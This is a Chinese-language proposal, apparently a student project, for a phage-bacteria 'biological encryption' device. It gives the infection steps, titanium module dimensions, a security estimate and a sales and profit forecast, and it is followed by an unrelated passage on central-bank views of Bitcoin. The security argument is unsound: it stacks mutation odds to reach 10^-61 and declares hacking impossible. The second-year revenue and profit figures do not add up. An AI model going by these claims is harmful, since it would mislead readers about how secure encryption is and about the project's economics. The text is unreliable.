1.它核心原理是利用噬菌体侵染细菌严格的一一对应性。首先我们要了解一下噬菌体(一种能感染细菌的病毒)侵染细菌的过程。
其侵染细菌的主要步骤包括:吸附、侵入、增值、成熟(装配)、裂解(释放)、等几步。
侵染的具体过程为:
(1)噬菌体用尾部的末端吸附在细菌的表面;
(2)噬菌体通过尾轴把DNA全部注入到细菌的细胞中,噬菌体的蛋白质外壳则留在细胞的外面,不起作用;
(3)噬菌体的DNA在细菌体内,利用细菌的化学成分合成自身的DNA和蛋白质;
(4)新合成的DNA与蛋白质外壳,组装出很多个与亲代一模一样的子代噬菌体;
(5)子代噬菌体由于细菌的解体而被释放出来,再去侵染其他的细菌。
2.噬菌体是只能侵入特定的细菌的,其条件是非常严格的。我们需要在实验室培养特定的噬菌体-细菌组合,它是经过特定的诱变处理的,当然这种组合是在自然条件下找不到的。我们培养出来的这种组合是随机的,这样可以提高安全性,他是经过特定的诱变处理的。因此只有这种组合组成一个解密模块。加上噬菌体和细菌上DNA的碱基数目庞大,所以其加密是非常安全的。
3.整个过程的实现:先简单用文字描述一下。
1. 研制噬菌体加密模块即噬菌体-细菌组合。(严格保密)
2. 制成模块并封装
3. 噬菌体侵染细菌,合成DNA。
4. DNA测序。解密条件:和噬菌体的DNA序列相同且有我们在细菌中加入的带有特殊辨识功能的碱基。
5. 条件符合。通过验证。
6. 其流程图如下
安全性说明:在严格保密的情况,第三方要破解,只能在实验室培养出一个对应的噬菌体-细菌组合来。通过诱变的方法其破解几率计算如下:
按照最大的诱变几率10-1来计算。温和性噬菌体的核心为线状dsDNA,长度为48514bp,约含61个基因。那么诱变出和加密噬菌体一样的噬菌体的几率为10-61。细菌的DNA上的碱基至少有10000个,加密我们在其上面选取10个加密点,用放射性元素处理。加上DNA的结构本身也是未知的。两者相乘,所以和它完全相同组合的概率基本为0。
其中计算机只用来分担网络的运行,不进行加密信息的处理,因此不存在通过计算机黑客技术的破解。
三.模块结构
模块结构按照我的设计已经画出了立体图和透视图,具体如下:
这是存放噬菌体的针,整体是空心的。装入噬菌体后,尾部用塞子封装。其中间为高压。整体长82mm,后面粗的地方直径6mm,孔直径3mm:前端直径2mm,孔直径1mm。钛合金制造。
这是上述针能插入的外套管。底部有空心球,存放解密的细菌。并且和DNA测序仪连通。为噬菌体侵染细菌的场所,其底部的球要求提供合适的温度,阳离子浓度,辅助因子。其长度为100mm,外径10mm,底部球的直径为8mm。同样为钛合金制造。
这是将要插入的状态。
这是完全插入的状态,针的底部遇到负压区,其中的噬菌体喷出。
四.加密模块、高速计算机、测序仪的网络布局。
五.整套加密技术的特色:
1.不同密码等级可以设定。不同的碱基组合的安全级别是不同的。
2.遇到破解尝试可以自毁。只要升高封装装置的温度就可以杀死细菌,破坏装置。装置就无法打开。
3.装置的解密组合可以更换,提高了安全性。随着科研能力的提高只要选用不同的噬菌体-细菌组合,就可以了。
六.社会意义和经济效益
社会意义:微生物加密技术能大大提高目前加密技术的安全性,从而使加密技术有一个质的飞跃。这可以为我国的国防,银行等部门提供前所未有的安全保障。更重要的是提高了生物技术在科技领域的作用,提高人们对生物技术的信心。为生物革命奠定基础。
经济效益:评价任何一项新技术的一个标准是这项技术是否有巨大的经济效益。我们可想而知,加密技术运用广泛,我们的日常生活离不开加密技术,试想一下要是在那么多的锁上用上次项技术,那
么其经济效益是巨大的。另外一些需要严格加密的部门如:银行、证券、安全部门就需要更加有效的加密技术。
每套装置的成本计算如下
1. 高速服务器 10万
2. DNA测序仪 15万
3. 网络费用 2万
4. 噬菌体模块封装外壳制造费用。 2万/年
5. 不同噬菌体-细菌组合的开发成本。 10万/年
6. 为各个单位保存,保密噬菌体的费用。 10万/年
初期实验室和设备投资10000万,每年为保证新产品的开发实验室和设备的更新花费1000万。
初期研发费用1000万。每年的研发费用增加10%
售价每套系统500万人民币,每年的许可证价格80万人民币。
系统预期寿命为10年。
预计第一年的销售量为50套,每年销售额增加10%。
第一年投资(10+15+2+2+10+10)*50+1000+10000=13450万
第一年销售额 500*50=25000万
第一年获利11550万
所以第一年投资就可收回。
第二年投资49*50*(1+10%)+1000(1+10%)+1000+50*22=5895万
第二年销售额 50*80+55*500=33500万
第二年获利27610万
且第三年以后获利将保持增加。
七.行业标准:
目前还没有生物加密的行业标准和国家标准。但是通过上面的安全性计算其安全性是非常好的。作为一项加密技术其安全性是应该放在首位的。我们奉行的是有价值的客户是上帝,其售后服务,和个性化改造都是一流的。
八.今后的规划:
1.噬菌体选择:运用转基因技术培养新菌种,增加获取噬菌体种类和遗传信息的难度。提高噬菌体加密的安全性。
2.减少菌体侵染时间:目前噬菌体的侵染时间:15秒,长的侵染周期降低了此技术的使用范围研究新的酶,提高侵染速度。
3.正确性验证的抗干扰能力的提高:这也是目前破解的主要手段。生物手段和高新技术的结合永远是噬菌体加密技术的研究方向。
4.封装技术的改进:因为是生物加密。生命物质有比较苛刻的生存条件。改进封装技术能提高此技术的使用范围。抗高温,抗辐射是主要的研究方向。
㈤ 央行谈加密资产监管,强调“投资工具”身份,,加密货币未来将会何去何从
央行在这一次的发布会当中就谈到了关于加密资产的监管问题,我们都知道现在最流行或者说话题性最高的加密资产应该就是比特币。而在这一次的央行发布会当中,有重点地点明了比特币也是一个重要的投资工具,而不是一个资产工具。那么今天我们就来探讨一下,加密货币未来将会何去何从。
第三,如何看待以后加密货币的存在?
当各个国家的数字货币全部流行起来的话,也就意味着像比特币这样的加密货币就没有生存的空间,毕竟在那个时候,比特币本身的稀缺性就已经被打破。而实际上,从严格意义上来说,比特币本身就没有稀缺性,其自身的价值也是不断炒作而来的。所以在我看来,正如同央行所说的那样,比特币只不过是一个投资工具,其本身并不具备货币的价值。